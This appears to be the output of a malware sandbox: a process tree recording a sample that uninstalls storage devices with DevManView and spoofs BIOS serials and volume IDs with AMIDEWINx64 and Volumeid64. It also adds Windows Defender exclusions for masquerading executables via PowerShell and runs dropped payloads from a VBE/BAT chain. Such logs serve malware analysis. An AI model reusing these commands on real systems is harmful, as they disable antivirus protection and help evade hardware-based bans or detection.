          - Enumerates connected drives
          - Maps connected drives based on registry
          - Checks SCSI registry key(s)
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          PID: 1684

        C:\ProgramData\Microsoft\Windows\DevManView.exe
          Command line: C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "F:\"
          - Executes dropped EXE
          - Enumerates connected drives
          - Maps connected drives based on registry
          - Checks SCSI registry key(s)
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          PID: 2892

        C:\ProgramData\Microsoft\Windows\DevManView.exe
          Command line: C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "G:\"
          - Executes dropped EXE
          - Enumerates connected drives
          - Maps connected drives based on registry
          - Checks SCSI registry key(s)
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          PID: 2320

        C:\ProgramData\Microsoft\Windows\DevManView.exe
          Command line: C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk"
          - Executes dropped EXE
          - Enumerates connected drives
          - Maps connected drives based on registry
          - Checks SCSI registry key(s)
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          PID: 576

        C:\ProgramData\Microsoft\Windows\DevManView.exe
          Command line: C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "disk"
          - Executes dropped EXE
          - Enumerates connected drives
          - Maps connected drives based on registry
          - Checks SCSI registry key(s)
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          PID: 572

        C:\ProgramData\Microsoft\Windows\DevManView.exe
          Command line: C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk&*" /use_wildcard""
          - Executes dropped EXE
          - Enumerates connected drives
          - Maps connected drives based on registry
          - Checks SCSI registry key(s)
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          PID: 3028

        C:\ProgramData\Microsoft\Windows\DevManView.exe
          Command line: C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "SWD\WPDBUSENUM*" /use_wildcard""
          - Executes dropped EXE
          - Enumerates connected drives
          - Maps connected drives based on registry
          - Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2836
-
-
C:\ProgramData\Microsoft\Windows\DevManView.exeC:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "USBSTOR*" /use_wildcard""5⤵
- Executes dropped EXE
- Enumerates connected drives
- Maps connected drives based on registry
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1820
-
-
C:\ProgramData\Microsoft\Windows\DevManView.exeC:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "SCSI\Disk*" /use_wildcard""5⤵
- Executes dropped EXE
- Enumerates connected drives
- Maps connected drives based on registry
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2428
-
-
C:\ProgramData\Microsoft\Windows\DevManView.exeC:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "STORAGE*" /use_wildcard""5⤵
- Executes dropped EXE
- Enumerates connected drives
- Maps connected drives based on registry
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:276
-
-
C:\ProgramData\Microsoft\Windows\DevManView.exeC:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "WAN Miniport*" /use_wildcard""5⤵
- Executes dropped EXE
- Enumerates connected drives
- Maps connected drives based on registry
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2408
-
-
-
[4] C:\Windows\system32\cmd.exe (PID 1588)
    cmd:  C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB
    sigs: Loads dropped DLL

[5] C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe (PID 2028)
    cmd:  C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 13721HP-TRGT24587AB
    sigs: Executes dropped EXE

[4] C:\Windows\system32\cmd.exe (PID 2664)
    cmd:  C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV

[5] C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe (PID 2676)
    cmd:  C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 213724HP-TRGT2567RV
    sigs: Executes dropped EXE

[4] C:\Windows\system32\cmd.exe (PID 2252)
    cmd:  C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG

[5] C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe (PID 1656)
    cmd:  C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 813724HP-TRGT2567SG
    sigs: Executes dropped EXE

[4] C:\Windows\system32\cmd.exe (PID 1040)
    cmd:  C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto

[5] C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe (PID 548)
    cmd:  C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
    sigs: Executes dropped EXE

[4] C:\Windows\system32\cmd.exe (PID 2804)
    cmd:  C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL

[5] C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe (PID 536)
    cmd:  C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 513724HP-TRGT2567SL
    sigs: Executes dropped EXE

[4] C:\Windows\system32\cmd.exe (PID 788)
    cmd:  C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA

[5] C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe (PID 1044)
    cmd:  C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 413724HP-TRGT2567FA
    sigs: Executes dropped EXE

[4] C:\Windows\system32\cmd.exe (PID 2272)
    cmd:  C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU

[5] C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe (PID 1696)
    cmd:  C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 613724HP-TRGT2567FU
    sigs: Executes dropped EXE

[4] C:\Windows\system32\cmd.exe (PID 844)
    cmd:  C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ

[5] C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe (PID 1444)
    cmd:  C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 313724HP-TRGT2567DQ
    sigs: Executes dropped EXE

[4] C:\Windows\system32\cmd.exe (PID 1340)
    cmd:  C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST

[5] C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe (PID 1816)
    cmd:  C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 713724HP-TRGT2567MST
    sigs: Executes dropped EXE

[4] C:\Windows\system32\cmd.exe (PID 1764)
    cmd:  C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF

[5] C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe (PID 1936)
    cmd:  C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
    sigs: Executes dropped EXE

[4] C:\Windows\System32\cmd.exe (PID 1708)
    cmd:  "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB

[5] C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe (PID 2760)
    cmd:  C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 13743HP-TRGT1522AB
    sigs: Executes dropped EXE

[4] C:\Windows\System32\cmd.exe (PID 1516)
    cmd:  "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV

[5] C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe (PID 2772)
    cmd:  C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 213743HP-TRGT1522RV
    sigs: Executes dropped EXE

[4] C:\Windows\System32\cmd.exe (PID 1580)
    cmd:  "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG

[5] C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe (PID 2636)
    cmd:  C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 813743HP-TRGT1522SG
    sigs: Executes dropped EXE

[4] C:\Windows\System32\cmd.exe (PID 1564)
    cmd:  "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto

[5] C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe (PID 2740)
    cmd:  C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
    sigs: Executes dropped EXE

[4] C:\Windows\System32\cmd.exe (PID 1700)
    cmd:  "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL

[5] C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe (PID 2664)
    cmd:  C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 513743HP-TRGT1522SL
    sigs: Executes dropped EXE

[4] C:\Windows\System32\cmd.exe (PID 2656)
    cmd:  "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA

[5] C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe (PID 2828)
    cmd:  C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 413743HP-TRGT1522FA
    sigs: Executes dropped EXE

[4] C:\Windows\System32\cmd.exe (PID 2820)
    cmd:  "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU

[5] C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe (PID 1036)
    cmd:  C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 613743HP-TRGT1522FU
    sigs: Executes dropped EXE

[4] C:\Windows\System32\cmd.exe (PID 2576)
    cmd:  "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ

[5] C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe (PID 704)
    cmd:  C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 313743HP-TRGT1522DQ
    sigs: Executes dropped EXE

[4] C:\Windows\System32\cmd.exe (PID 2676)
    cmd:  "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST

[5] C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe (PID 3024)
    cmd:  C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 713743HP-TRGT1522MST
    sigs: Executes dropped EXE

[4] C:\Windows\System32\cmd.exe (PID 2684)
    cmd:  "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF

[5] C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe (PID 2252)
    cmd:  C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
    sigs: Executes dropped EXE

[4] C:\Windows\System32\cmd.exe (PID 788)
    cmd:  "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB

[5] C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe (PID 2220)
    cmd:  C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 13760HP-TRGT22496AB
    sigs: Executes dropped EXE

[4] C:\Windows\System32\cmd.exe (PID 1572)
    cmd:  "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV

[5] C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe (PID 2288)
    cmd:  C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 213760HP-TRGT22496RV
    sigs: Executes dropped EXE

[4] C:\Windows\System32\cmd.exe (PID 844)
    cmd:  "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG

[5] C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe (PID 2492)
    cmd:  C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 813760HP-TRGT22496SG
    sigs: Executes dropped EXE

[4] C:\Windows\System32\cmd.exe (PID 1340)
    cmd:  "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto

[5] C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe (PID 796)
    cmd:  C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
    sigs: Executes dropped EXE

[4] C:\Windows\System32\cmd.exe (PID 1652)
    cmd:  "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL

[5] C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe (PID 2480)
    cmd:  C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 513760HP-TRGT22496SL
    sigs: Executes dropped EXE

[4] C:\Windows\System32\cmd.exe (PID 556)
    cmd:  "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA

[5] C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe (PID 2428)
    cmd:  C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 413760HP-TRGT22496FA
    sigs: Executes dropped EXE

[4] C:\Windows\System32\cmd.exe (PID 1300)
    cmd:  "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU

[5] C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe (PID 1600)
    cmd:  C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 613760HP-TRGT22496FU
    sigs: Executes dropped EXE

[4] C:\Windows\System32\cmd.exe (PID 2372)
    cmd:  "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ

[5] C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe (PID 2064)
    cmd:  C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 313760HP-TRGT22496DQ
    sigs: Executes dropped EXE

[4] C:\Windows\System32\cmd.exe (PID 2156)
    cmd:  "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST

[5] C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe (PID 1488)
    cmd:  C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 713760HP-TRGT22496MST
    sigs: Executes dropped EXE

[4] C:\Windows\System32\cmd.exe (PID 900)
    cmd:  "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF

[5] C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe (PID 1544)
    cmd:  C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
    sigs: Executes dropped EXE
[4] C:\Windows\System32\cmd.exe (PID 2704)
    cmd:  "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe a: L6AF-IMA0

[5] C:\ProgramData\Microsoft\Windows\Volumeid64.exe (PID 2660)
    cmd:  C:\ProgramData\Microsoft\Windows\Volumeid64.exe a: L6AF-IMA0
    sigs: Executes dropped EXE

[4] C:\Windows\System32\cmd.exe (PID 1712)
    cmd:  "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe b: M8O7-8E3A

[5] C:\ProgramData\Microsoft\Windows\Volumeid64.exe (PID 1928)
    cmd:  C:\ProgramData\Microsoft\Windows\Volumeid64.exe b: M8O7-8E3A
    sigs: Executes dropped EXE

[4] C:\Windows\System32\cmd.exe (PID 2220)
    cmd:  "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: N5BO-COAU

[5] C:\ProgramData\Microsoft\Windows\Volumeid64.exe (PID 1640)
    cmd:  C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: N5BO-COAU
    sigs: Executes dropped EXE

[4] C:\Windows\System32\cmd.exe (PID 2436)
    cmd:  "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe d: IGIR-TEFD

[5] C:\ProgramData\Microsoft\Windows\Volumeid64.exe (PID 2892)
    cmd:  C:\ProgramData\Microsoft\Windows\Volumeid64.exe d: IGIR-TEFD
    sigs: Executes dropped EXE

[4] C:\Windows\System32\cmd.exe (PID 1796)
    cmd:  "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe e: 9U0R-98E3

[5] C:\ProgramData\Microsoft\Windows\Volumeid64.exe (PID 2288)
    cmd:  C:\ProgramData\Microsoft\Windows\Volumeid64.exe e: 9U0R-98E3
    sigs: Executes dropped EXE

[4] C:\Windows\System32\cmd.exe (PID 1404)
    cmd:  "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe f: L7JE-IEAE

[5] C:\ProgramData\Microsoft\Windows\Volumeid64.exe (PID 2192)
    cmd:  C:\ProgramData\Microsoft\Windows\Volumeid64.exe f: L7JE-IEAE
    sigs: Executes dropped EXE

[4] C:\Windows\System32\cmd.exe (PID 968)
    cmd:  "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe g: VLBU-SKL4

[5] C:\ProgramData\Microsoft\Windows\Volumeid64.exe (PID 1320)
    cmd:  C:\ProgramData\Microsoft\Windows\Volumeid64.exe g: VLBU-SKL4
    sigs: Executes dropped EXE

[4] C:\Windows\System32\cmd.exe (PID 820)
    cmd:  "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe h: KE9P-0Z8T

[5] C:\ProgramData\Microsoft\Windows\Volumeid64.exe (PID 1788)
    cmd:  C:\ProgramData\Microsoft\Windows\Volumeid64.exe h: KE9P-0Z8T
    sigs: Executes dropped EXE

[4] C:\Windows\System32\cmd.exe (PID 2176)
    cmd:  "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe i: IGGP-UKLB

[5] C:\ProgramData\Microsoft\Windows\Volumeid64.exe (PID 556)
    cmd:  C:\ProgramData\Microsoft\Windows\Volumeid64.exe i: IGGP-UKLB
    sigs: Executes dropped EXE

[4] C:\Windows\System32\cmd.exe (PID 1544)
    cmd:  "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe j: RAOO-RRR6

[5] C:\ProgramData\Microsoft\Windows\Volumeid64.exe (PID 1076)
    cmd:  C:\ProgramData\Microsoft\Windows\Volumeid64.exe j: RAOO-RRR6

[4] C:\Windows\System32\cmd.exe (PID 2476)
    cmd:  "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe k: KKLB-C960

[5] C:\ProgramData\Microsoft\Windows\Volumeid64.exe (PID 1684)
    cmd:  C:\ProgramData\Microsoft\Windows\Volumeid64.exe k: KKLB-C960

[4] C:\Windows\System32\cmd.exe (PID 2280)
    cmd:  "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe l: A7NP-UNMH

[5] C:\ProgramData\Microsoft\Windows\Volumeid64.exe (PID 1624)
    cmd:  C:\ProgramData\Microsoft\Windows\Volumeid64.exe l: A7NP-UNMH

[4] C:\Windows\System32\cmd.exe (PID 1812)
    cmd:  "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe m: T75M-GHH0

[5] C:\ProgramData\Microsoft\Windows\Volumeid64.exe (PID 1552)
    cmd:  C:\ProgramData\Microsoft\Windows\Volumeid64.exe m: T75M-GHH0

[4] C:\Windows\System32\cmd.exe (PID 1072)
    cmd:  "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe n: VN8B-T1O4

[5] C:\ProgramData\Microsoft\Windows\Volumeid64.exe (PID 2400)
    cmd:  C:\ProgramData\Microsoft\Windows\Volumeid64.exe n: VN8B-T1O4

[4] C:\Windows\System32\cmd.exe (PID 1632)
    cmd:  "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe o: CT84-1AJB

[5] C:\ProgramData\Microsoft\Windows\Volumeid64.exe (PID 2408)
    cmd:  C:\ProgramData\Microsoft\Windows\Volumeid64.exe o: CT84-1AJB

[4] C:\Windows\System32\cmd.exe (PID 1924)
    cmd:  "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe p: 2URZ-S22J

[5] C:\ProgramData\Microsoft\Windows\Volumeid64.exe (PID 2836)
    cmd:  C:\ProgramData\Microsoft\Windows\Volumeid64.exe p: 2URZ-S22J

[4] C:\Windows\System32\cmd.exe (PID 2972)
    cmd:  "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe r: R5JO-GH97

[5] C:\ProgramData\Microsoft\Windows\Volumeid64.exe (PID 2352)
    cmd:  C:\ProgramData\Microsoft\Windows\Volumeid64.exe r: R5JO-GH97

[4] C:\Windows\System32\cmd.exe (PID 2900)
    cmd:  "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe s: AI2T-KCTR

[5] C:\ProgramData\Microsoft\Windows\Volumeid64.exe (PID 2056)
    cmd:  C:\ProgramData\Microsoft\Windows\Volumeid64.exe s: AI2T-KCTR

[4] C:\Windows\System32\cmd.exe (PID 2992)
    cmd:  "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe t: OPT2-TZJR

[5] C:\ProgramData\Microsoft\Windows\Volumeid64.exe (PID 2772)
    cmd:  C:\ProgramData\Microsoft\Windows\Volumeid64.exe t: OPT2-TZJR

[4] C:\Windows\System32\cmd.exe (PID 1616)
    cmd:  "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe u: SIMD-UBC1

[5] C:\ProgramData\Microsoft\Windows\Volumeid64.exe (PID 1800)
    cmd:  C:\ProgramData\Microsoft\Windows\Volumeid64.exe u: SIMD-UBC1

[4] C:\Windows\System32\cmd.exe (PID 1656)
    cmd:  "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe v: KJVC-5HR7

[5] C:\ProgramData\Microsoft\Windows\Volumeid64.exe (PID 2664)
    cmd:  C:\ProgramData\Microsoft\Windows\Volumeid64.exe v: KJVC-5HR7

[4] C:\Windows\System32\cmd.exe (PID 2808)
    cmd:  "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe y: COD4-LHH7

[5] C:\ProgramData\Microsoft\Windows\Volumeid64.exe (PID 2516)
    cmd:  C:\ProgramData\Microsoft\Windows\Volumeid64.exe y: COD4-LHH7

[4] C:\Windows\System32\cmd.exe (PID 2820)
    cmd:  "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe z: 5MPH-K67N

[5] C:\ProgramData\Microsoft\Windows\Volumeid64.exe (PID 2656)
    cmd:  C:\ProgramData\Microsoft\Windows\Volumeid64.exe z: 5MPH-K67N

[4] C:\Windows\System32\cmd.exe (PID 2652)
    cmd:  "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\DevManView.cfg

[4] C:\Windows\System32\cmd.exe (PID 1448)
    cmd:  "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\DevManView.chm

[4] C:\Windows\System32\cmd.exe (PID 2588)
    cmd:  "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\DevManView.exe

[4] C:\Windows\System32\cmd.exe (PID 2576)
    cmd:  "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\amide.sys

[4] C:\Windows\System32\cmd.exe (PID 2888)
    cmd:  "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\amifldrv64.sys

[4] C:\Windows\System32\cmd.exe (PID 2816)
    cmd:  "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

[4] C:\Windows\System32\cmd.exe (PID 1296)
    cmd:  "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\Disk.bat
[3] C:\Users\Admin\AppData\Roaming\sphyperRuntimedhcpSvc.exe (PID 2592)
    cmd:  "C:\Users\Admin\AppData\Roaming\sphyperRuntimedhcpSvc.exe"
    sigs: Executes dropped EXE; Suspicious use of WriteProcessMemory

[4] C:\Windows\SysWOW64\WScript.exe (PID 584)
    cmd:  "C:\Windows\System32\WScript.exe" "C:\ChainReview\4N7V2tIOe7KSQ8eET3YGuCyK2Y.vbe"

[5] C:\Windows\SysWOW64\cmd.exe (PID 1116)
    cmd:  cmd /c ""C:\ChainReview\8xoM57ln5l3nWVEqwKA0TDOQ0Am35EOuQMtKP.bat" "
    sigs: Loads dropped DLL

[6] C:\ChainReview\sphyperRuntimedhcpSvc.exe (PID 2400)
    cmd:  "C:\ChainReview/sphyperRuntimedhcpSvc.exe"
    sigs: Executes dropped EXE; Drops file in Program Files directory; Suspicious behavior: EnumeratesProcesses

[7] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2352)
    cmd:  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Videos\explorer.exe'
    sigs: Command and Scripting Interpreter: PowerShell

[7] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2964)
    cmd:  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows Photo Viewer\fr-FR\spoolsv.exe'
    sigs: Command and Scripting Interpreter: PowerShell

[7] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 776)
    cmd:  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Defender\fr-FR\lsass.exe'
    sigs: Command and Scripting Interpreter: PowerShell

[7] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2416)
    cmd:  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ChainReview\taskhost.exe'
    sigs: Command and Scripting Interpreter: PowerShell

[7] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1552)
    cmd:  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ChainReview\DevManView.exe'
    sigs: Command and Scripting Interpreter: PowerShell

[7] C:\Windows\System32\cmd.exe (PID 1952)
    cmd:  "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\4ZoQI0Qg2k.bat"

[8] C:\Windows\system32\chcp.com (PID 2476)
    cmd:  chcp 65001

[8] C:\Windows\system32\PING.EXE (PID 1716)
    cmd:  ping -n 10 localhost
    sigs: Runs ping.exe

[8] C:\Program Files (x86)\Windows Photo Viewer\fr-FR\spoolsv.exe (PID 2208)
    cmd:  "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\spoolsv.exe"
    sigs: Executes dropped EXE
[3] C:\Users\Admin\AppData\Roaming\conhostsft.exe (PID 2220)
    cmd:  "C:\Users\Admin\AppData\Roaming\conhostsft.exe"
    sigs: Executes dropped EXE; Loads dropped DLL; Suspicious use of WriteProcessMemory

[4] C:\Users\Admin\AppData\Roaming\.conhostsft.exe (PID 2212)
    cmd:  "C:\Users\Admin\AppData\Roaming\.conhostsft.exe"
    sigs: Executes dropped EXE; Drops file in System32 directory

[5] C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe (PID 1208)
